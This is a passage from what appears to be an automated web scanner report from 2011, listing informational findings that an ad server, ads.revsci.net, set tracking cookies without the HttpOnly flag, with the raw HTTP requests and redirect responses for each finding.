rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtWbj6GKPTeto2o206rx7XdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9FXqajQPusTp1Jcs8ZjfglfknWAN/Q1IfyZw5h0t1bS95yIeZFtkPXSC2LxApOiqcQjM6vzFrEqEYTBt+vGOrPGvAgmk6EujcF1pARpPpVf1t8GJcgXgZqGCYmfomxtXdEgF5VKMZEFWBmbNUKntEp+ukrNGGBkXCmINvvD2jww0YZ7hmZNBoLNjfcex0Zl4CJC36Z4USPuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFf/+1/xUY2A6W6SqbcuheULZgHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2SFYgoO7k+RZWUd0XDMaGcg3JqM/wuDmnuWWb0A4COsclOeEQtHtMWW3/snkkNcgVm7VDJfkCm6cjOTrvlOItggKPIusbL1l9SCaB99VdIjRitqqb3WE8ef2luiUylYJxjwzBtb+QBbLiC7/pZjNWAycY5tP/aRFsAiCBupTjGYjm2g0lHMDqDrmlPMoscSYxhTTPv0KuN3m/EHY62T5Ybif1g+5CbvHd48MQZdo4gIxa2ziYKirixPgI/vnDwea4BL4iinQWN+AIncp4UYoiLCWtpcrIRtS9MgPS6DIFnjQGyv2+z+jIrmAoHMMiwl2RATjCQeV+rkFcTCsGNYksONovJdR5NKAGZWNoFpiSfZPYB1taJHpApkWWC5HQR2TSEsOPvnrTO97GqGy3v+4KyaxwMFuCLHS2kq0YgKXQMBA7NAdk77MeO9hTm31Gm0RKqWr8kM45JW+VUIho7H9Y8jWf7dAfdzDjskSOFAYILVnxSgKnS47RV57TZ72P1HE0E82c+PZVqML3+BjNrt1HwJ5CeCU3tHXiQJc2q8DAT4Eh6R5wsQQa1LW7rHc8JX9ATBuaDtmPphjkIZ8U0vbrZ9Ik58JYB0K4lccxDWK7o1rKItXy97q+0Szc2/Ipa3ZbyO1slKuyCzgqZbam9cmA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0uRB="MLsXr98vcS5joAC3camm7m2LoDlezxNylzFx7q/7jh3vp9AaQ0d9+4VlvUgGPKQSVQ0KcSykIsBNoGXZdCAjuytlySGQ8/OftgBmlbDwxFXRsomko1dhpOEfNP9MWs6AJTpJGx4KVi3NyPLg6Ty1pZmBPol2v9eYT5WRqRvcf4u7txMu41iZYICzca0HKhAQnwG5+txYSjJVizEkhHghBeBMejkXDWkFVpZFcJOam5H6TC/Tk1UQDlT2PROx4nyyaEMjdDmLFNf1MZpXO9+vMJzhD7J7mRXm6jp5YWVv1nqFetXyeSI7ZLD/HSjFMKINO4FJgacxXDy5cV+HgtmUtTj0WAtVBJbk2nr4A7CJzwfNMNhtayL1bGn7HiJkIFLdmtlcSukRVDvh+KeaKP5f8TgfTiH6y91un+b23Q=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soH0f//DC7T+Ic8+Pr1nwUVevtCuE5/4IrgrPwDhQFpkUH9FP70YBKszuOe3UntXFMcTHLwgRLgVdrk3Un+lJZ/5e0yGlLruWUfqFPMt4Ra0+I8MJVwu20bf9vn4fQdGiwg6WnLAVuwjfo+LLfaow047Iln7+U+3J6ljUNMRuOkdO+Mn/yv8Ph4raozqmp2KbF/M/a1XxqebKzuxmu8P4iJRDp1Ntv4/dIGw9D2DMN9PwOraB87GBl1xM1/boOivuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFc9G1/w0gmA6W6SqbcuheULZwHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2TFYggAzs+RZG0d0XDMaGcg3JqM/wuDWn6Wub0A/DucMtOeFRNXtMWW31c4nOqAAjGb6dEXs6cNZjpO7StgJpoDpkVKZVGLKfEh9jQ9l6nSztR6DyjuvmxCgsa46ly8aszaWZYZJmTuIQbm69sfr5mW3/PK3SvJi6DXR0PMaJsaqJ5q9fCF3PFxL8LFhHm80FFGihrqbvB3bQHHLhlk8d2VR8SeYammYKxZevEfy1KHOMBa3YpJ2lN0Opstz27gxRQgqs/InUyx+li/d9t9KwaSz3VOxH0Ri4Yywxr7Ig6qmMk9xXzakMFVw4BGQRcMBBazm2cBmuu8nKUZKWJqXd5gkwvN2O+FhcMNi6UqYZEdlhfVc9wXJMhMgKs6B4oTJPFt6VptUoFNcs35hRw4EbB8HodfVeMO1nV/ce9raL2Krjq29xAZ/HV9fbmMqTnC0kkaMMPeIJ5jGritmycpL6Y9Y5aJbbmSj7WiK4jex59VdY8bmG18R7EK55Y9XONQd8/87mj2Com+PLwweMLwYNe5Gp3WWG5eIx0v8yJwjPizFzH5yT7Gz7hpI4/A90CViAXPC38wcaxfRCbbbXW9kJ1bot+CMUBQUZbSZUiCeNUh9IFhoqHhTFLLH6caSwzmpmqVNHQI9uZrOUh8WjlexA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:16:37 GMT


14.22. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_f0-W="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVa5tqbfn/gBxYTeR02M2pSI8HR/ZfycAkbv/sDi9oySDDVp8H1BGXR3mIUBTO7FKiNbMke6vxBxCHU3H1o3TjA9xAN/W2fhrOqqGOw8C0qJAVmkXkdeVE7e0ejAJJ6HYYr7xC6Td58SGhALqjGJZwEN75CrLUsT4+Hzl5viSAFnI10jBinOo8ffl6vFjB/o0L1JNa/08FxWUp4CjxpsDaYpsY4Am5miDNP1KfB4UPjRwpkqxQ7FuRkQUKXgs11CqcjjGVzv3rkYig4aSw8VHmZ9t2ZFq2vFiY7rz2Ih8eifoUijie6EymXBguDwcPA4SNFV/B3bqofNbcpLSklSaW8DaoITTktjus8RrWDX2Zw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE2jMAYU1Q2ENhuq3vIHtebrqMSpxsBz2o206rx7XdHqk2MHqYoAOld9rYtu+8u94QGhvrJf//mchCGk4X4xYR9YkhtFwZ+EHmvWXwanym+SKowdMgpK+G3TxpdT0+UgCZvwumkbf9vr4fQdGiwg6WnLAVuwjfo+LLfarQ046Iln78U+3J6ljUNMRuOkdO9Mnnyv8Ph4raozCmp2JrF/M/a1XxqZbKwuxtKGBsXCeINuvT1Dwg0YZ75iZNBoLOjf8W13Zl4CJC36Z4XiPuYYx7VVLswcQ1f1IUpRi0tVP1zSjeXFcN+1/w1gmA6W6CqbcuheULZAHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbLvbNT3fMCvtaDXIyrPwkoF8w6lNfTOtYtQFAz/IV4IPJWrD4KNtBKX22t0hxAm0v8J+kyCJ5ZzeQHic0omqoQI7nLtu10sFOz45YNec6XtAETkLs4MrS7FQ3IH3RPl9RghFVFL7AEBmZE6MLJb8R6Ojt6pNENLP0GFYiwm4TFb2SKn/BmuPGX+RQ53Pf3GEKvM6HCcOInSycBShfBaMhcAq/KXvUNyqcAH2V8YfjH3lKrXOpuTKlHgZTGmttlgL0VyX7DTMGfmjw5nw6zHe7h8/H5H1l0favdnkJI76/bA6W84/9aDU/Cl809vV+3f2eyldWLQwoKFaZn+cIoqtfx2xIyakfHxpK8WAJkNdJ/VnFZyKF2DzG99kicoZ19MRVVbFwfqwTyhIimN8HHGPaSdQqgrwOHKiGXAhVX7/9fojrdQmDpupJa/BnCDIM7bCV0xp2fXSEZFMoYFwJ/qKWGcdsTyzJzWgNNbMS4vq0nzsOFGgWuDDtcNdhnLcctVF7u9hBNQrtjPyNsYMBUdSYwUDEeR6PfA3KWx0Po7RAH1AiSzp4GWpRWkyFeQ2C1zx0IhQBeU/EMbnxLCIswaO/RDRMb7kEpKawwdPrfxayZYVWUqsn2gWHlnEx77G9qbp8u1ERAyiijHe7S3pCw34KPEgWMPlsbqqkw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:16:55 GMT


14.23. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGHppJ8S4dCaezGRJhlUWVyRvUosdoZNavV8q90zKD5s/ez6yLk/3MyALEhJth7PRDWcqYy1fztHQnZ+eGOprDErg4uKj3Y26WxWclP5Xwum07f9vg4fQdGgwgCWnLAVuwjXo9LLfaqw046Iln7+E+3F6qjUNIRuOkdO9MYwCv4CDy0/3Kb9+Wl3aCZv0ItNg1+yO6kh/JTRJxDejvBYxAgmw7i43J3ecXGUlCWv2i5Nf79A1wYSKmlJCIaymo3gG4KwA1yTTI6t4Nkc6tqs2NbI61n+o6xA+Y77YQlrYTI9JJbPgZKRz3+ulGoPGhSkQQ1GbdMwH+y/dWWUtyw24DCRz/AcqY3cG4oo0NIK9CLwBfQh26itpdy4mf8bOovwDj0eaa6g62V2hfDTysp7moX5MYjmHlhgj7JvXOxjXVuyAp1V0RKl12NJ3nGHMI65/MZUj90SXBV8RL5ZenSRMka2G3IaKIvKih5uQb+QJ7LqGL9pZiO2AudY9hX/aRFtAiCBuqTjfnnm2gMnEMf/52b9pFxHk+8EG6iwrqbv53bcHGIhlkcdyNR4SeoSXfFd48PzZdq4AIxW2yjYKjriwPAI6vnDIea4CL7QinSWNGEIkSqIXYtFNiYIVFvIJtS2MFxcfzJXdcAfn8ozwv03Bi0JzmeaCHEoIqyMSEqoJaI/JqaqOGOWdjmlZUYLQIBnDO+TGFxtx+FBjVY1sWLMrNv6c4B44LpPENQqOMcBXWyly86T6H2zx246HUzjUmwZ6jui1LBt9nRTW59ygZ/XX//bkI2DnA0okFtLxeR/J9gYwfiH+KRqguE7UJbbiSjrWiKo7Ox59VdZcbmC0ER00K5/r3XvdcFwpkzWDRZKpU65hkqtFIcZe5WmY38LsdMH268wBBiQqcAohZQHUG15pBgz3LB7kMWAUnSKHiE2X2pagnZmTVmWVP476LC8KGVdX2Eph7k1eYUQjRVJqr0q2tVIyN6OWkrSGPJKRsP1AZL3rEdIZfeg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o_YB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_YB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hX-W="MLsXr98vcS5joAD35amm7m19U6iUxxv6U9Ewo82dvq95LzyKcUd+SGxIJH6o5AWlJkXeWWHv5qH4v/rM6OkMWqsFTvNPsXNekBTra/wwM4K2sibLTV2AOHFxkiVE9wV4/aofu4mf+YzCLyKAhfLTTeqCuZtujWf0mVUBm5iueociN9nMcHEBiWq4o9fatvXmE6yZ/0kCX73FbCLj/eLX67dLITBGr6Vts2oYC1XMLcjvcbHvF+Gfp+KabcKl3A3N5GRsbVvBxAgcV8qGf0I5oRF4rmVtRQWqfG3YSgbjakDBikQcLdr73FrrV7LpTFHBo/ShP4v0zweUXVvR2lDfsTUqd9mF4ch3/QIDNuIgzv2zwCKIcl4kIFp4Jb57PXWhqKOjlNBT/qEfJ76Dv808tBtcl+x2CIuaYlEz7rw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1alXr9BmaqyZcgtsTgox7CLyoprYp1/zjRrRdkE/0saMayW1zRBctP4S6OvfJlCxVYlEdNlLrjQdALUzrVeczrQefVoO0/q0m9kAg9P/oCOMPJZss+pplsORhgl+llLQbNRgD3q9KOBpcmtNX6lYn3MRrKbEUKls9oRIVpNN41zokjpyeOpu6gqvo3XQQqZfYIqU8FuMO8gdpZQmblt2FJeOTh6LlOa3JmcSpGXnfR8D4pf6MREwpe7hIarrRyyzz0habHjklxZ1XVlR/DG0weNS1YxMm9x2oZ1UNBLdkNX4PT6FCycjrd4zNqglqfpk2TgWNd5lDN+8DIW7lXVbaoVt8s6ors/eWQUMRuWz38y1G9mKxjOS4aVRVDXNumTvi1vA9vPCy+OL/abeliEDrdwk/bH2H+VfnDCt5qM6IM35w5jjvb0CtQAF49dJD1B78SKhj8NZFUEceldIHW1o43LFMREEtdGdU90PBoMciEgFpt73X0YO9owc/Gf6Ybh0e9KOQIpROavaaHG1xRkxBMRWK82gXGVoiDNSWEXfh2feZwTlqYAO1NP8EFG/8o6nYPShAtISuCD/sLRpU7ynslfUlvcrwLUhc29zCm+FmNDC4/CHKZvIaauG6jQi6P4eQxPIlrbxV8nrdmkimQWspCOlUuRke9tNnBKWg7YKJAG49/WwOyeuOy11+t7EhGsHDmiid4U8l8NHpyhFONeseVrYlzb6X6QnmdO1P3SsAbInuT8dis2BAk1DVSkb7DKlu9G+vY+nyAkjRmbZkDHtTawKZh/5ALg+hCpgBDeS/89vWYqZ5GmmYwQI8hT9D38W2XNZKe9mPQODMvs8Kkrz08wXBsKtINlzl0rWjyHHVAKU3MmBA9uXkHr0oaOZeR6Dx2oA5IkP04PsI2ZIwqMoK7cq7R8O/OSyl5f9H5hCIC7WsLNH3zNIiKaJPtKT2PmGwK98+pqZUlAvV+qM/rOlA9gJjRwmfK0Q+ErGz+L2RINP2PSq3jFAEfi48HBFpLE1To"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 12:34:33 GMT


14.24. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

